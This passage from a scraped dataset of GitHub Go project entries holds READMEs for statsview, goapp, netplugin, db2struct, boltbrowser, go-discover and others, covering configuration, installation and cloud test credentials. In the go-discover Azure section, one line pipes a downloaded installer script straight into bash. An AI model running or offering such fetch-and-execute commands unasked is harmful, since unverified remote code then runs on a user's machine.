Configuration\n\nStatsview gets a variety of configurations for the users. 
Everyone could customize their favorite charts style.\n\n```golang\n// WithInterval sets the interval(in Millisecond) of collecting and pulling metrics\n// default -> 2000\nWithInterval(interval int)\n\n// WithMaxPoints sets the maximum points of each chart series\n// default -> 30\nWithMaxPoints(n int)\n\n// WithTemplate sets the rendered template which fetching stats from the server and\n// handling the metrics data\nWithTemplate(t string)\n\n// WithAddr sets the listening address and link address\n// default -> \"localhost:18066\"\nWithAddr(addr string)\n\n// WithLinkAddr sets the html link address\n// default -> \"localhost:18066\"\nWithLinkAddr(addr string)\n\n// WithTimeFormat sets the time format for the line-chart Y-axis label\n// default -> \"15:04:05\"\nWithTimeFormat(s string)\n\n// WithTheme sets the theme of the charts\n// default -> Macarons\n//\n// Optional:\n// * ThemeWesteros\n// * ThemeMacarons\nWithTheme(theme Theme)\n```\n\n#### Set the options\n\n```golang\nimport (\n \"github.com/go-echarts/statsview\"\n \"github.com/go-echarts/statsview/viewer\"\n)\n\n// set configurations before calling `statsview.New()` method\nviewer.SetConfiguration(viewer.WithTheme(viewer.ThemeWesteros), viewer.WithAddr(\"localhost:8087\"))\n\nmgr := statsview.New()\ngo mgr.Start()\n```\n\n## \ud83d\uddc2 Viewers\n\nViewer is the abstraction of a Graph which in charge of collecting metrics from Runtime. Statsview provides some default viewers as below.\n\n* `GCCPUFractionViewer`\n* `GCNumViewer`\n* `GCSizeViewer`\n* `GoroutinesViewer`\n* `HeapViewer`\n* `StackViewer`\n\nViewer wraps a go-echarts [*charts.Line](https://github.com/go-echarts/go-echarts/blob/master/charts/line.go) instance that means all options/features on it could be used. To be honest, I think that is the most charming thing about this project.\n\n## \ud83d\udd16 Snapshot\n\n#### ThemeMacarons(default)\n\n![Macarons](https://user-images.githubusercontent.com/19553554/99491359-92d9f680-29a6-11eb-99c8-bc333cb90893.png)\n\n#### ThemeWesteros\n\n![Westeros](https://user-images.githubusercontent.com/19553554/99491179-42629900-29a6-11eb-852b-694662fcd3aa.png)\n\n## \ud83d\udcc4 License\n\nMIT [\u00a9chenjiandongx](https://github.com/chenjiandongx)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "it234/goapp", "link": "https://github.com/it234/goapp", "tags": [], "stars": 510, "description": "Gin + GORM + Casbin + vue-element-admin \u5b9e\u73b0\u7684\u6743\u9650\u7ba1\u7406\u7cfb\u7edf(golang)", "lang": "Go", "repo_lang": "", "readme": "

# GOAPP

\n\n
\n A permission management system implemented with Gin + GORM + Casbin + vue-element-admin
\n RBAC permission management implemented with Casbin
\n Front-end implementation: vue-element-admin
\n Online demo: http://35.241.100.145:5315
\n
\n
\n\n## Features\n\n- RBAC access control model based on Casbin (see the sketch after the project structure overview below)\n- JWT authentication\n- Separated front end and back end\n\n## Download and Run\n\n### Get the code\n\n```\ngo get -v github.com/it234/goapp\n```\n\n### Run\n\n- You can try the packaged desktop client directly; download address: https://pan.baidu.com/s/1wDsHH-KMQHV5tMRUv50Q3w extraction code: 9u2d\n- Run the server: cd cmd/manageweb, then go run main.go; once it starts, open 127.0.0.1:8080. On Windows you need to install and configure mingw first (required by the sqlite driver); search Baidu/Google for installation instructions.\n- Debug/run the web front end: cd website/manageweb; install with npm install, run with npm run dev, build with npm run build:prod\n- The configuration file is `cmd/manageweb/config.yaml`; the default user is admin/123456\n\n\n#### Tips\n\n1. The default configuration uses a sqlite database; the database file (created automatically) is at `cmd/manageweb/data/goapp.db`. To switch to `mysql` or `postgres`, change the configuration file and create the database (the tables are created automatically).\n2. Logging goes to standard output and is also written to a file.\n\n## Front-end implementation\n\n- website/manageweb: an implementation based on [vue-element-admin](https://github.com/PanJiaChen/vue-element-admin)\n\n## Project structure overview\n\n
.\n\u251c\u2500\u2500 cmd  the project's main applications\n\u251c\u2500\u2500 internal  private application and library code\n\u251c\u2500\u2500 pkg  library code that external applications may use\n\u251c\u2500\u2500 vendor  third-party dependencies of the project\n\u251c\u2500\u2500 website  vue-element-admin\n
\n
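To make the stack described above concrete, here is a minimal, hypothetical sketch of a Gin route guarded by a Casbin RBAC check, which is roughly the combination this project is built around. It is not taken from this repository's code: the `model.conf`/`policy.csv` file names and the `username` context key are placeholders, and a real deployment would typically load the policy from the database through a Casbin adapter and take the subject from the JWT middleware.

```go
package main

import (
	"net/http"

	"github.com/casbin/casbin/v2"
	"github.com/gin-gonic/gin"
)

// authorize asks Casbin whether the current subject may perform the
// request's HTTP method on the request's path.
func authorize(e *casbin.Enforcer) gin.HandlerFunc {
	return func(c *gin.Context) {
		// "username" is assumed to have been set by a JWT auth middleware.
		sub := c.GetString("username")
		ok, err := e.Enforce(sub, c.Request.URL.Path, c.Request.Method)
		if err != nil || !ok {
			c.AbortWithStatusJSON(http.StatusForbidden, gin.H{"error": "forbidden"})
			return
		}
		c.Next()
	}
}

func main() {
	// model.conf and policy.csv are placeholder names for a standard
	// Casbin RBAC model definition and its policy rules.
	e, err := casbin.NewEnforcer("model.conf", "policy.csv")
	if err != nil {
		panic(err)
	}

	r := gin.Default()
	r.Use(authorize(e))
	r.GET("/api/users", func(c *gin.Context) {
		c.JSON(http.StatusOK, gin.H{"users": []string{"admin"}})
	})
	r.Run(":8080")
}
```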
\n\n\n## \u754c\u9762\u622a\u56fe\n\n
\n\u5c55\u5f00\u67e5\u770b\n
.\n

\n

\n

\n

\n

\n
\n
\n\n## Donate\n\n- If you find this project useful, you can buy author a glass of juice \n- alipay\n- \n- wechat\n- \n- [Buy me a coffee](https://www.buymeacoffee.com/it234)\n- bitcoin address : 1LwTcCZ1p5kq8UokZGUBVy3BL1wRa3q5Wn\n- eth address : 0x68ca43651529D12996183d09a052a654F845cB89\n- eos address : 123451234534\n\n## \u76f8\u5173\u6587\u7ae0\n\n- [\u5982\u4f55\u4f7f\u7528goapp\u5199\u4f60\u7684\u540e\u53f0\u7ba1\u7406\u7cfb\u7edf] - [https://www.cnblogs.com/hotion/p/11665837.html/](https://www.cnblogs.com/hotion/p/11665837.html/)\n\n## \u611f\u8c22\u4ee5\u4e0b\u6846\u67b6\u7684\u5f00\u6e90\u652f\u6301\n\n- [Gin] - [https://gin-gonic.com/](https://gin-gonic.com/)\n- [GORM] - [http://gorm.io/](http://gorm.io/)\n- [Casbin] - [https://casbin.org/](https://casbin.org/)\n- [vue-element-admin] - [https://github.com/PanJiaChen/vue-element-admin/](https://github.com/PanJiaChen/vue-element-admin/)\n\n\n## MIT License\n\n Copyright (c) 2019 it234\n\n## \u4e0e\u4f5c\u8005\u5bf9\u8bdd\n\n> \u4f5c\u8005\u5fae\u4fe1\u53f7\uff1ait23456789\uff0c\u5fae\u4fe1\u4e8c\u7ef4\u7801\uff1a\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "miekg/learninggo", "link": "https://github.com/miekg/learninggo", "tags": ["golang", "book", "free", "mmark", "exercises"], "stars": 510, "description": "Learning Go Book in mmark", "lang": "Go", "repo_lang": "", "readme": "# Learning Go\n\nThis is the \"Learning Go\" book in mmark markdown. It is translated\nto HTML with [mmark](https://github.com/mmarkdown/mmark).\n\nAfter some post processing (with some javascript) [the end result, can be found\nhere](http://miek.nl/go/learninggo.html).\n\n## To Build\n\n* Download or `go get` [mmark](https://github.com/mmarkdown/mmark).\n* `cd `\n* `go build`\n* `go install` - optional\n\nAnd then just `make` in this repository.\n\n## Notes\n\nThe stack exercise and solution uses `struct` which are not being dealt with yet.\n", "readme_type": "markdown", "hn_comments": "If anyone is interested in Go (Golang) we're hiring Go developers at Torbit. http://torbit.com/jobsCould you please put this up on Leanpub (http://www.leanpub.com)? It will take care of the compiling for you, and I'd like to pay a bit for it.Also, leanpub is awesome (I'm not affiliated with them, but I'm a very happy user).The latest version should be at the bottom of this list: http://www.miek.nl/files/go/I'm tempted to learn Go just because it's a new language and I think it would be awesome to be part of a budding community.I was expecting a book on learning Go, the game. I was disappointed.I hate it when people name new things with a name that obviously conflicts with something else that's likely to be known and discussed in the same community.What is the canonical way to convert this to ASCII? Can it be done with nroff? Tried l2a and hevea. No luck.I am reading this book now and will send a commit with typo fixes when finish.Even after Effective Go and gotour I found a lot of useful information in this book. Thanks the author for his work! :)This is a great resource, especially for being free and the source being available, but in case miek is reading... what is with the left margin on even numbered pages?Looks good and up to date. Just the right amount of pages for a programming language book, IMO it shouldn't exceed 200 pages. 
Thank you.On first glance this looks excellent, but I have to question producing a book on a language so steeped in unicode with a markup language that makes it so unwieldy.eg. $\\Phi{}$ = ", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "contiv/netplugin", "link": "https://github.com/contiv/netplugin", "tags": ["docker", "docker-plugin", "networking", "containers", "container-networking", "kubernetes-networking"], "stars": 510, "description": "Container networking for various use cases", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://contiv-ci.ngrok.io/job/Netplugin%20Push%20Build%20Master/badge/icon)](https://contiv-ci.ngrok.io/job/Netplugin%20Push%20Build%20Master/) \n[![Go Report Card](https://goreportcard.com/badge/github.com/contiv/netplugin)](https://goreportcard.com/report/github.com/contiv/netplugin)\n\n## Netplugin\n\nGeneric network plugin is designed to handle networking use\ncases in clustered multi-host systems. It is specifically designed to handle:\n\n- Multi-tenant environment where disjoint networks are offered to containers on the same host\n- SDN applications and interoperability with SDN solutions\n- Interoperability with non container environment and hand-off to a physical network\n- Instantiating policies/ACL/QoS associated with containers\n- Multicast or multi-destination dependent applications\n- Integration with existing IPAM tools for migrating customers\n- Handle NIC's capabilities for acceleration (SRIOV/Offload/etc.)\n\n### Documentation\nFull, comprehensive documentation is available on the website:\n\nhttp://docs.contiv.io\n\nGetting-started videos are available on [YouTube](https://www.youtube.com/watch?v=KzansAxCBQE&list=PL2k86RlAekM_g6csRwSRQAWvln5SmgicN).\n\n### Getting Started\n\nThis will provide you with a minimal experience of uploading the intent and\nseeing the netplugin system act on it. It will create a network on your host\nthat lives behind an OVS bridge and has its own unique interfaces.\n\n#### Step 1: Clone the project and bringup the VMs\n\nNote: if you have $GOPATH set, then please ensure either you unset GOPATH,\nor clone the tree in `$GOPATH/src/github.com/contiv/` location\n\n```\n$ git clone https://github.com/contiv/netplugin\n$ cd netplugin; make demo\n$ vagrant ssh netplugin-node1\n```\n\nOptionally, variables can be passed to Makefile if needed. 
For example, to\nuse 4 GB memory and 2 CPUs for the vagrant VMs, run:\n\n```\nCONTIV_MEMORY=4096 CONTIV_CPUS=2 make demo\n```\n\nCONTIV_MEMORY and CONTIV_CPUS are set to 2048 and 4 as the default values\nrespectively.\n\n#### Step 2: Create a network\n\n```\n$ netctl net create contiv-net --subnet=20.1.1.0/24\n\tor\nnetctl net create contiv-net --subnet=20.1.1.0/24 --subnetv6=2001::/100 \n```\n\n#### Step 3: Run your containers and enjoy the networking!\n\n```\n$ docker run -itd --name=web --net=contiv-net alpine /bin/sh\n$ docker run -itd --name=db --net=contiv-net alpine /bin/sh\n$ docker exec -it web /bin/sh\n< inside the container >\nroot@f90e7fd409c4:/# ping db\nPING db (20.1.1.3) 56(84) bytes of data.\n64 bytes from db (20.1.1.3): icmp_seq=1 ttl=64 time=0.658 ms\n64 bytes from db (20.1.1.3): icmp_seq=2 ttl=64 time=0.103 ms\n```\n\n\n### Building and Testing\n\n**Note:** Vagrant 1.7.4 and VirtualBox 5.0+ are required to build and test netplugin.\n\nHigh level `make` targets:\n\n* `demo`: start three VM demo cluster for development or testing.\n* `build`: build the binary in a VM and download it to the host.\n* `unit-test`: run the unit tests. Specify `CONTIV_NODE_OS=centos` to test on centos instead of ubuntu.\n* `system-test`: run the networking/\"sanity\" tests. Specify `CONTIV_NODE_OS=centos` to test on centos instead of ubuntu.\n\n\n### How to Contribute\nPatches and contributions are welcome, please hit the GitHub page to open an\nissue or to submit patches send pull requests. Please sign your commits, and\nread [CONTRIBUTING.md](.github/CONTRIBUTING.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Shelnutt2/db2struct", "link": "https://github.com/Shelnutt2/db2struct", "tags": ["hacktoberfest2020"], "stars": 510, "description": "Converts a mysql table into a golang struct", "lang": "Go", "repo_lang": "", "readme": "# db2struct [![Build Status](https://travis-ci.org/Shelnutt2/db2struct.svg?branch=master)](https://travis-ci.org/Shelnutt2/db2struct) [![Coverage Status](https://coveralls.io/repos/github/Shelnutt2/db2struct/badge.svg?branch=1-add-coveralls-support)](https://coveralls.io/github/Shelnutt2/db2struct?branch=1-add-coveralls-support) [![GoDoc](https://godoc.org/github.com/Shelnutt2/db2struct?status.svg)](https://godoc.org/github.com/Shelnutt2/db2struct)\n\nThe db2struct package produces a usable golang struct from a given database table for use in a .go file.\n\nBy reading details from the database about the column structure, db2struct generates a go compatible struct type\nwith the required column names, data types, and annotations.\n\nGenerated datatypes include support for nullable columns [sql.NullX types](https://golang.org/pkg/database/sql/#NullBool) or [guregu null.X types](https://github.com/guregu/null)\nand the expected basic built in go types.\n\nDb2Struct is based/inspired by the work of ChimeraCoder's gojson package\n[gojson](https://github.com/ChimeraCoder/gojson)\n\n\n\n## Usage\n\n```BASH\ngo get github.com/Shelnutt2/db2struct/cmd/db2struct\ndb2struct --host localhost -d test -t test_table --package myGoPackage --struct testTable -p --user testUser\n```\n\n## Example\n\nMySQL table named users with four columns: id (int), user_name (varchar(255)), number_of_logins (int(11),nullable), and LAST_NAME (varchar(255), nullable) \n\nExample below uses guregu's null package, but without the option it procuded the sql.NullInt64 and so on.\n```BASH\ndb2struct --host localhost -d 
example.com -t users --package example --struct user -p --user exampleUser --guregu --gorm\n```\n\nOutput:\n```GOLANG\n\npackage example\n\ntype User struct {\n ID int `gorm:\"column:id\"`\n UserName string `gorm:\"column:user_name\"`\n NumberOfLogins null.Int `gorm:\"column:number_of_logins\"`\n LastName null.String `gorm:\"column:LAST_NAME\"`\n}\n```\n\n## Supported Databases\n\nCurrently Supported\n- MariaDB\n- MySQL\n\nPlanned Support\n- PostgreSQL\n- Oracle\n- Microsoft SQL Server\n\n### MariaDB/MySQL\n\nStructures are created by querying the INFORMATION_SCHEMA.Columns table and then formatting the types, column names,\nand metadata to create a usable go compatible struct type.\n\n#### Supported Datatypes\n\nCurrently only a limited number of MariaDB/MySQL datatypes are supported. Initial support includes:\n- tinyint (sql.NullInt64 or null.Int)\n- int (sql.NullInt64 or null.Int)\n- smallint (sql.NullInt64 or null.Int)\n- mediumint (sql.NullInt64 or null.Int)\n- bigint (sql.NullInt64 or null.Int)\n- decimal (sql.NullFloat64 or null.Float)\n- float (sql.NullFloat64 or null.Float)\n- double (sql.NullFloat64 or null.Float)\n- datetime (null.Time)\n- time (null.Time)\n- date (null.Time)\n- timestamp (null.Time)\n- var (sql.String or null.String)\n- enum (sql.String or null.String)\n- varchar (sql.String or null.String)\n- longtext (sql.String or null.String)\n- mediumtext (sql.String or null.String)\n- text (sql.String or null.String)\n- tinytext (sql.String or null.String)\n- binary\n- blob\n- longblob\n- mediumblob\n- varbinary\n- json\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mmorejon/microservices-docker-go-mongodb", "link": "https://github.com/mmorejon/microservices-docker-go-mongodb", "tags": [], "stars": 510, "description": "Example of Microservices in Go with Docker, Kubernetes and MongoDB", "lang": "Go", "repo_lang": "", "readme": "# Cinema - Example of Microservices in Go with Docker, Kubernetes and MongoDB\n\n## Overview\n\nCinema is an example project which demonstrates the use of microservices for a fictional movie theater.\nThe Cinema backend is powered by 4 microservices, all of which happen to be written in Go, using MongoDB for manage the database and Docker to isolate and deploy the ecosystem.\n\n * Movie Service: Provides information like movie ratings, title, etc.\n * Show Times Service: Provides show times information.\n * Booking Service: Provides booking information.\n * Users Service: Provides movie suggestions for users by communicating with other services.\n\nThe Cinema use case is based on the project written in Python by [Umer Mansoor](https://github.com/umermansoor/microservices).\n\nThe project structure is based in the knowledge learned in:\n\n* Golang structure: \n* Book Let's Go: \n\nContainer images used support multi-architectures (amd64, arm/v7 and arm64).\n\n## Index\n\n* [Deployment](#deployment)\n* [How To Use Cinema Services](#how-to-use-cinema-services)\n* [Related Posts](related-posts)\n* [Significant Revisions](#significant-revisions)\n* [The big picture](#screenshots)\n\n## Deployment\n\nThe application can be deployed in both environments: **local machine** or in a **kubernetes cluster**. 
You can find the appropriate documentation for each case in the following links:\n\n* [local machine (docker compose)](./docs/localhost.md)\n* [kubernetes](./docs/kubernetes.md)\n\n## How To Use Cinema Services\n\n* [endpoints](./docs/endpoints.md)\n\n## Related Posts\n\n* [Traefik 2 - Advanced configuration with Docker Compose](https://mmorejon.io/en/blog/traefik-2-advanced-configuration-docker-compose/)\n\n## Significant Revisions\n\n* [Microservices - Martin Fowler](http://martinfowler.com/articles/microservices.html)\n* [Umer Mansoor - Cinema](https://github.com/umermansoor/microservices)\n* [Traefik Proxy Docs](https://doc.traefik.io/traefik/)\n* [MongoDB Driver for Golang](https://github.com/mongodb/mongo-go-driver)\n* [MongoDB Golang Channel](https://www.youtube.com/c/MongoDBofficial/search?query=golang)\n\n## Screenshots\n\n### Architecture\n\n![overview](docs/images/overview.jpg)\n\n### Homepage\n\n![website home page](docs/images/website-home.jpg)\n\n### Users List\n\n![users list page](docs/images/website-users.jpg)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "br0xen/boltbrowser", "link": "https://github.com/br0xen/boltbrowser", "tags": [], "stars": 509, "description": "A CLI Browser for BoltDB Files", "lang": "Go", "repo_lang": "", "readme": "boltbrowser\n===========\n\nA CLI Browser for BoltDB Files\n\n![Image of About Screen](http://bullercodeworks.com/boltbrowser/ss2.png)\n\n![Image of Main Browser](http://bullercodeworks.com/boltbrowser/ss1.png)\n\nInstalling\n----------\n\nInstall in the standard way:\n\n```sh\ngo get github.com/br0xen/boltbrowser\n```\n\nThen you'll have `boltbrowser` in your path.\n\nPre-built Binaries\n------------------\nHere are pre-built binaries:\n* [Linux 64-bit](https://git.bullercodeworks.com/attachments/29367198-79f9-4fb3-9a66-f71a0e605006)\n* [Linux 32-bit](https://git.bullercodeworks.com/attachments/ba8b9116-a013-431d-b266-66dfa16f2a88)\n* [Linux Arm](https://git.bullercodeworks.com/attachments/795108a6-79e3-4723-b9a8-83803bc27f20)\n* [Windows 64-bit](https://git.bullercodeworks.com/attachments/649993d9-bf2c-46ea-98dd-1994f1c73020)\n* [Windows 32-bit](https://git.bullercodeworks.com/attachments/c1662c27-524c-465a-8739-b021fb15066b)\n* [Mac OS](https://git.bullercodeworks.com/attachments/10270b6f-9316-446d-8ab4-4022142323b3)\n\nUsage\n-----\n\nJust provide a BoltDB filename to be opened as the first argument on the command line:\n\n```sh\nboltbrowser \n```\n\nTo see all options that are available, run:\n\n```\nboltbrowser --help\n```\n\nTroubleshooting\n---------------\n\nIf you're having trouble with garbled characters being displayed on your screen, you may try a different value for `TERM`. \nPeople tend to have the best luck with `xterm-256color` or something like that. 
Play around with it and see if it fixes your problems.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/go-discover", "link": "https://github.com/hashicorp/go-discover", "tags": [], "stars": 509, "description": "Discover nodes in cloud environments", "lang": "Go", "repo_lang": "", "readme": "# Go Discover Nodes for Cloud Providers [![CircleCI](https://circleci.com/gh/hashicorp/go-discover.svg?style=shield)](https://circleci.com/gh/hashicorp/go-discover) [![GoDoc](https://godoc.org/github.com/hashicorp/go-discover?status.svg)](https://godoc.org/github.com/hashicorp/go-discover)\n\n\n`go-discover` is a Go (golang) library and command line tool to discover\nip addresses of nodes in cloud environments based on meta information\nlike tags provided by the environment.\n\nThe configuration for the providers is provided as a list of `key=val key=val\n...` tuples. If either the key or the value contains a space (` `), a backslash\n(`\\`) or double quotes (`\"`) then it needs to be quoted with double quotes.\nWithin a quoted string you can use the backslash to escape double quotes or the\nbackslash itself, e.g. `key=val \"some key\"=\"some value\"`\n\nDuplicate keys are reported as error and the provider is determined through the\n`provider` key.\n\n### Supported Providers\n\nThe following cloud providers have implementations in the go-discover/provider\nsub packages. Additional providers can be added through the\n[Register](https://godoc.org/github.com/hashicorp/go-discover#Register)\nfunction.\n\n * Aliyun (Alibaba) Cloud [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/aliyun/aliyun_discover.go#L21-L34)\n * Amazon AWS [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/aws/aws_discover.go#L19-L34)\n * DigitalOcean [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/digitalocean/digitalocean_discover.go#L22-L30)\n * Google Cloud [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/gce/gce_discover.go#L23-L43)\n * Linode [Config options](https://github.com/hashicorp/go-discover/blob/master/provider/linode/linode_discover.go#L30-L41)\n * mDNS [Config options](https://github.com/hashicorp/go-discover/blob/master/provider/mdns/mdns_provider.go#L19-L31)\n * Microsoft Azure [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/azure/azure_discover.go#L24-L62)\n * Openstack [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/os/os_discover.go#L29-L44)\n * Scaleway [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/scaleway/scaleway_discover.go#L14-L22)\n * SoftLayer [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/softlayer/softlayer_discover.go#L16-L25)\n * TencentCloud [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/tencentcloud/tencentcloud_discover.go#L23-L37)\n * Triton [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/triton/triton_discover.go#L17-L27)\n * vSphere [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/vsphere/vsphere_discover.go#L145-L157)\n * Packet [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/packet/packet_discover.go#L25-L40)\n\nThe following providers are implemented in the go-discover/provider subdirectory\nbut aren't automatically 
registered. If you want to support these providers,\nregister them manually:\n\n * Kubernetes [Config options](https://github.com/hashicorp/go-discover/blob/8b3ddf4/provider/k8s/k8s_discover.go#L32-L59)\n\nHashiCorp maintains acceptance tests that regularly allocate and run tests with\nreal resources to verify the behavior of several of these providers. Those\ncurrently are: Amazon AWS, Microsoft Azure, Google Cloud, DigitalOcean, Triton, Scaleway, AliBaba Cloud, vSphere, and Packet.net.\n\n### Config Example\n\n```\n# Aliyun (Alibaba) Cloud\nprovider=aliyun region=... tag_key=consul tag_value=... access_key_id=... access_key_secret=...\n\n# Amazon AWS\nprovider=aws region=eu-west-1 tag_key=consul tag_value=... access_key_id=... secret_access_key=...\n\n# DigitalOcean\nprovider=digitalocean region=... tag_name=... api_token=...\n\n# Google Cloud\nprovider=gce project_name=... zone_pattern=eu-west-* tag_value=consul credentials_file=...\n\n# Linode\nprovider=linode tag_name=... region=us-east address_type=private_v4 api_token=...\n\n# mDNS\nprovider=mdns service=consul domain=local\n\n# Microsoft Azure\nprovider=azure tag_name=consul tag_value=... tenant_id=... client_id=... subscription_id=... secret_access_key=...\n\n# Openstack\nprovider=os tag_key=consul tag_value=server username=... password=... auth_url=...\n\n# Scaleway\nprovider=scaleway organization=my-org tag_name=consul-server token=... region=...\n\n# SoftLayer\nprovider=softlayer datacenter=dal06 tag_value=consul username=... api_key=...\n\n# TencentCloud\nprovider=tencentcloud region=ap-guangzhou tag_key=consul tag_value=... access_key_id=... access_key_secret=...\n\n# Triton\nprovider=triton account=testaccount url=https://us-sw-1.api.joyentcloud.com key_id=... tag_key=consul-role tag_value=server\n\n# vSphere\nprovider=vsphere category_name=consul-role tag_name=consul-server host=... user=... password=... insecure_ssl=[true|false]\n\n# Packet\nprovider=packet auth_token=token project=uuid url=... address_type=...\n\n# Kubernetes\nprovider=k8s label_selector=\"app = consul-server\"\n```\n\n## Command Line Tool Usage\n\nInstall the command line tool with:\n\n```\ngo get -u github.com/hashicorp/go-discover/cmd/discover\n```\n\nThen run it with:\n\n```\n$ discover addrs provider=aws region=eu-west-1 ...\n```\n\n## Library Usage\n\nInstall the library with:\n\n```\ngo get -u github.com/hashicorp/go-discover\n```\n\nYou can then either support discovery for all available providers\nor only for some of them.\n\n```go\n// support discovery for all supported providers\nd := discover.Discover{}\n\n// support discovery for AWS and GCE only\nd := discover.Discover{\n\tProviders : map[string]discover.Provider{\n\t\t\"aws\": discover.Providers[\"aws\"],\n\t\t\"gce\": discover.Providers[\"gce\"],\n\t}\n}\n\n// use ioutil.Discard for no log output\nl := log.New(os.Stderr, \"\", log.LstdFlags)\n\ncfg := \"provider=aws region=eu-west-1 ...\"\naddrs, err := d.Addrs(cfg, l)\n```\n\nYou can also add support for providers that aren't registered by default:\n\n```go\n// Imports at top of file\nimport \"github.com/hashicorp/go-discover/provider/k8s\"\n\n// support discovery for all supported providers\nd := discover.Discover{}\n\n// support discovery for AWS and GCE only\nd := discover.Discover{\n\tProviders : map[string]discover.Provider{\n\t\t\"k8s\": &k8s.Provider{},\n\t}\n}\n\n// ...\n```\n\nFor complete API documentation, see\n[GoDoc](https://godoc.org/github.com/hashicorp/go-discover). 
The configuration\nfor the supported providers is documented in the\n[providers](https://godoc.org/github.com/hashicorp/go-discover/provider)\nsub-package.\n\n## Testing\n\n**Note: Due to the `go.sum` checksum errors referenced in [#68](https://github.com/hashicorp/go-discover/issues/68), \nyou will need Go 1.11.4+ to build/test go-discover.**\n\nConfiguration tests can be run with Go:\n\n```\n$ go test ./...\n```\n\nBy default tests that communicate with providers do not run unless credentials\nare set for that provider. To run provider tests you must set the necessary\nenvironment variables.\n\n**Note: This will make real API calls to the account provided by the credentials.**\n\n```\n$ AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_REGION=... go test -v ./provider/aws\n```\n\nThis requires resources to exist that match those specified in tests\n(eg instance tags in the case of AWS). To create these resources,\nthere are sets of [Terraform](https://www.terraform.io) configuration\nin the `test/tf` directory for supported providers.\n\nYou must use the same account and access credentials above. The same\nenvironment variables should be applicable and read by Terraform.\n\n```\n$ cd test/tf/aws\n$ export AWS_ACCESS_KEY_ID=... AWS_SECRET_ACCESS_KEY=... AWS_REGION=...\n$ terraform init\n...\n$ terraform apply\n...\n```\n\nAfter Terraform successfully runs, you should be able to successfully\nrun the tests, assuming you have exported credentials into\nyour environment:\n\n```\n$ go test -v ./provider/aws\n```\n\nTo destroy the resources you need to use Terraform again:\n\n```\n$ cd test/tf/aws\n$ terraform destroy\n...\n```\n\n**Note: There should be no requirements to create and test these resources other\nthan credentials and Terraform. This is to ensure tests can run in development\nand CI environments consistently across all providers.**\n\n## Retrieving Test Credentials\n\nBelow are instructions for retrieving credentials in order to run\ntests for some of the providers.\n\n
\n### Google Cloud\n\n1. Go to https://console.cloud.google.com/\n1. IAM & Admin / Settings:\n * Create Project, e.g. `discover`\n * Write down the `Project ID`, e.g. `discover-xxx`\n1. Billing: Ensure that the project is linked to a billing account\n1. API Manager / Dashboard: Enable the following APIs\n * Google Compute Engine API\n1. IAM & Admin / Service Accounts: Create Service Account\n * Service account name: `admin`\n * Roles:\n * `Project/Service Account Actor`\n * `Compute Engine/Compute Instance Admin (v1)`\n * `Compute Engine/Compute Security Admin`\n * Furnish a new private key: `yes`\n * Key type: `JSON`\n1. The credentials file `discover-xxx.json` will have been downloaded\n automatically to your machine\n1. Source the contents of the credentials file into the `GOOGLE_CREDENTIALS`\n environment variable\n\n
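A quick sketch of that last step (this is not part of the upstream instructions; `discover-xxx.json` is the example key file named above), followed by a GCE provider test run in the same style as the AWS command from the Testing section:\n\n```\n# key file downloaded in the steps above\n$ export GOOGLE_CREDENTIALS=\"$(cat discover-xxx.json)\"\n$ go test -v ./provider/gce\n```\n\nThe gce provider may expect additional settings (for example the `Project ID` noted earlier), so check its config options link above if the tests report missing configuration.\n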
\n\n
\n### Azure\n\nSee also the [Terraform provider documentation](https://www.terraform.io/docs/providers/azurerm/index.html#creating-credentials).\n\n```shell\n# Install Azure CLI (https://github.com/Azure/azure-cli)\ncurl -L https://aka.ms/InstallAzureCli | bash\n\n# 1. Login\n$ az login\n\n# 2. Get SubscriptionID\n$ az account list\n[\n {\n \"cloudName\": \"AzureCloud\",\n \"id\": \"subscription_id\",\n \"isDefault\": true,\n \"name\": \"Gratis versie\",\n \"state\": \"Enabled\",\n \"tenantId\": \"tenant_id\",\n \"user\": {\n \"name\": \"user@email.com\",\n \"type\": \"user\"\n }\n }\n]\n\n# 3. Switch to subscription\n$ az account set --subscription=\"subscription_id\"\n\n# 4. Create ClientID and Secret\n$ az ad sp create-for-rbac --role=\"Contributor\" --scopes=\"/subscriptions/subscription_id\"\n{\n \"appId\": \"client_id\",\n \"displayName\": \"azure-cli-2017-07-18-16-51-43\",\n \"name\": \"http://azure-cli-2017-07-18-16-51-43\",\n \"password\": \"client_secret\",\n \"tenant\": \"tenant_id\"\n}\n\n# 5. Export the Credentials for the client\nexport ARM_CLIENT_ID=client_id\nexport ARM_CLIENT_SECRET=client_secret\nexport ARM_TENANT_ID=tenant_id\nexport ARM_SUBSCRIPTION_ID=subscription_id\n\n# 6. Test the credentials\n$ az vm list-sizes --location 'West Europe'\n```\n
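\nWith the `ARM_*` variables exported, the Azure provider tests can then be run the same way as the AWS example in the Testing section (assuming the matching Terraform resources under `test/tf` have been applied first):\n\n```\n$ go test -v ./provider/azure\n```\n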
